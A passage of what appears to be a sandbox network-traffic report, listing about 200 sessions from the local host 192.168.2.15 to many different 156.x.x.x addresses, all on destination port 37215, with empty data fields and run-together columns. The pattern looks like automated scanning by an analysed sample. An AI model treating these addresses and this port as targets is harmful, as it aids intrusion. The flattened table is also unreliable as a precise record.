                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25390192.168.2.1555276156.241.187.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25391192.168.2.1550996156.190.236.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25392192.168.2.1554890156.25.28.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25393192.168.2.1554646156.102.96.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25394192.168.2.1539318156.107.43.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25395192.168.2.1544986156.91.187.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25396192.168.2.1536982156.39.206.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25397192.168.2.1555210156.218.150.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25398192.168.2.1547640156.194.101.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25399192.168.2.1534948156.90.94.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25400192.168.2.1546200156.80.251.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25401192.168.2.1544848156.193.204.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25402192.168.2.1540184156.93.153.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25403192.168.2.1553932156.251.206.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25404192.168.2.1539776156.64.150.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25405192.168.2.1536762156.134.138.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25406192.168.2.1547322156.106.33.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25407192.168.2.1553256156.46.92.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25408192.168.2.1553568156.9.150.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25409192.168.2.1541212156.98.132.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25410192.168.2.1546474156.101.85.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25411192.168.2.1548294156.251.69.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25412192.168.2.1543882156.124.115.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25413192.168.2.1541482156.217.246.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25414192.168.2.1546294156.19.67.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25415192.168.2.1541718156.111.183.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25416192.168.2.1560960156.160.139.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25417192.168.2.1534364156.32.127.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25418192.168.2.1541958156.124.27.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25419192.168.2.1554522156.126.146.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25420192.168.2.1557174156.210.251.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25421192.168.2.1545566156.95.239.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25422192.168.2.1554574156.157.106.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25423192.168.2.1547698156.243.101.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25424192.168.2.1549226156.44.255.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25425192.168.2.1551280156.119.94.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25426192.168.2.1551462156.170.2.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25427192.168.2.1559852156.123.226.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25428192.168.2.1546984156.42.219.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25429192.168.2.1538184156.150.109.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25430192.168.2.1543234156.51.189.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25431192.168.2.1545300156.222.113.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25432192.168.2.1552764156.11.132.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25433192.168.2.1533832156.65.119.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25434192.168.2.1547902156.45.198.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25435192.168.2.1536588156.188.152.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25436192.168.2.1538274156.20.125.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25437192.168.2.1533976156.42.222.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25438192.168.2.1534362156.119.18.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25439192.168.2.1546724156.17.98.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25440192.168.2.1553668156.251.26.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25441192.168.2.1556982156.60.202.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25442192.168.2.1554296156.34.148.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25443192.168.2.1540328156.112.116.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25444192.168.2.1535060156.218.200.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25445192.168.2.1545662156.117.174.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25446192.168.2.1534792156.165.117.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25447192.168.2.1553908156.175.43.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25448192.168.2.1545118156.139.217.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25449192.168.2.1533944156.21.246.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25450192.168.2.1540192156.134.20.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25451192.168.2.1542490156.121.0.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25452192.168.2.1552340156.242.123.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25453192.168.2.1553564156.186.227.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25454192.168.2.1548278156.147.162.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25455192.168.2.1535486156.28.73.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25456192.168.2.1551258156.112.141.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25457192.168.2.1541432156.141.160.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25458192.168.2.1541382156.63.142.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25459192.168.2.1555680156.129.157.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25460192.168.2.1543678156.51.141.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25461192.168.2.1547120156.244.162.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25462192.168.2.1550252156.126.83.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25463192.168.2.1547014156.114.28.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25464192.168.2.1547150156.163.2.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25465192.168.2.1554712156.235.205.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25466192.168.2.1536588156.78.136.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25467192.168.2.1541858156.116.112.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25468192.168.2.1536152156.204.128.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25469192.168.2.1532982156.53.165.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25470192.168.2.1535020156.171.88.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25471192.168.2.1558140156.107.67.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25472192.168.2.1541076156.100.178.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25473192.168.2.1555188156.219.126.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25474192.168.2.1554556156.68.185.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25475192.168.2.1552044156.115.182.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25476192.168.2.1545276156.7.34.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25477192.168.2.1558546156.108.33.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25478192.168.2.1545822156.184.150.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25479192.168.2.1557012156.1.124.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25480192.168.2.1559994156.82.195.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25481192.168.2.1559502156.180.28.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25482192.168.2.1551794156.229.213.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25483192.168.2.1556522156.39.169.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25484192.168.2.1543664156.136.40.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25485192.168.2.1549070156.1.100.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25486192.168.2.1533008156.110.215.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25487192.168.2.1547428156.159.82.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25488192.168.2.1554358156.219.156.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25489192.168.2.1552778156.74.122.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25490192.168.2.1538540156.142.24.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25491192.168.2.1539732156.183.3.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25492192.168.2.1536538156.19.19.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25493192.168.2.1536982156.189.113.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25494192.168.2.1557232156.79.37.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25495192.168.2.1554276156.240.215.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25496192.168.2.1552072156.229.134.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25497192.168.2.1557928156.54.103.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25498192.168.2.1557378156.85.77.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25499192.168.2.1533852156.90.215.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25500192.168.2.1544334156.21.232.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25501192.168.2.1560456156.149.229.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25502192.168.2.1537528156.220.88.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25503192.168.2.1538784156.156.13.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25504192.168.2.1554432156.77.54.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25505192.168.2.1535940156.59.224.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25506192.168.2.1551836156.64.80.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25507192.168.2.1533644156.65.55.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25508192.168.2.1534632156.161.192.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25509192.168.2.1547212156.231.235.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25510192.168.2.1539214156.85.137.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25511192.168.2.1549750156.83.204.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25512192.168.2.1543148156.187.13.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25513192.168.2.1543400156.178.33.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25514192.168.2.1553454156.213.26.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25515192.168.2.1535784156.26.235.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25516192.168.2.1544376156.99.2.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25517192.168.2.1545190156.16.89.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25518192.168.2.1545018156.214.85.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25519192.168.2.1539560156.10.14.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25520192.168.2.1547160156.190.89.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25521192.168.2.1541760156.23.109.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25522192.168.2.1549146156.151.152.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25523192.168.2.1536002156.46.22.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25524192.168.2.1555860156.34.178.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25525192.168.2.1545736156.67.198.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25526192.168.2.1558370156.21.188.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25527192.168.2.1536154156.64.14.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25528192.168.2.1538054156.119.2.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25529192.168.2.1534876156.103.53.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25530192.168.2.1541470156.252.81.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25531192.168.2.1559226156.185.180.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25532192.168.2.1536570156.193.3.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25533192.168.2.1534282156.184.121.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25534192.168.2.1555714156.27.219.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25535192.168.2.1535044156.214.61.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25536192.168.2.1553606156.54.1.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25537192.168.2.1544120156.205.162.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25538192.168.2.1541808156.178.85.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25539192.168.2.1547974156.160.207.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25540192.168.2.1534830156.181.200.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25541192.168.2.1533012156.27.218.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25542192.168.2.1534100156.73.72.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25543192.168.2.1547430156.147.153.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25544192.168.2.1543948156.216.156.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25545192.168.2.1559456156.182.200.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25546192.168.2.1560404156.120.75.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25547192.168.2.1536324156.11.15.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25548192.168.2.1540750156.100.89.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25549192.168.2.1543842156.243.163.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25550192.168.2.1537518156.100.240.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25551192.168.2.1550674156.96.74.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25552192.168.2.1543080156.11.229.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25553192.168.2.1538120156.83.6.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25554192.168.2.1554760156.12.55.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25555192.168.2.1543294156.210.92.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25556192.168.2.1538370156.151.203.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25557192.168.2.1547776156.58.213.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25558192.168.2.1536866156.0.161.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25559192.168.2.1540640156.172.111.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25560192.168.2.1539312156.49.16.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25561192.168.2.1556448156.202.49.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25562192.168.2.1547348156.38.22.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25563192.168.2.1542670156.116.103.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25564192.168.2.1543714156.41.20.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25565192.168.2.1535834156.225.120.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25566192.168.2.1538600156.150.67.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25567192.168.2.1540024156.1.104.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25568192.168.2.1550200156.87.186.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25569192.168.2.1547388156.10.196.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25570192.168.2.1559376156.42.240.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25571192.168.2.1536450156.82.162.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25572192.168.2.1533992156.225.250.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25573192.168.2.1546164156.234.92.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25574192.168.2.1533036156.211.236.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25575192.168.2.1556558156.211.120.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25576192.168.2.1532900156.212.187.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25577192.168.2.1555678156.102.208.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25578192.168.2.1559076156.159.159.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25579192.168.2.1544912156.72.201.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25580192.168.2.1549654156.64.181.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25581192.168.2.1549956156.28.51.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25582192.168.2.1548396156.222.150.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25583192.168.2.1543234156.216.172.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25584192.168.2.1544194156.4.179.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25585192.168.2.1556860156.236.159.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25586192.168.2.1533446156.23.61.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25587192.168.2.1536098156.255.135.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25588192.168.2.1547072156.15.102.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25589192.168.2.1560772156.168.28.18437215
                                                                            TimestampBytes transferredDirectionData


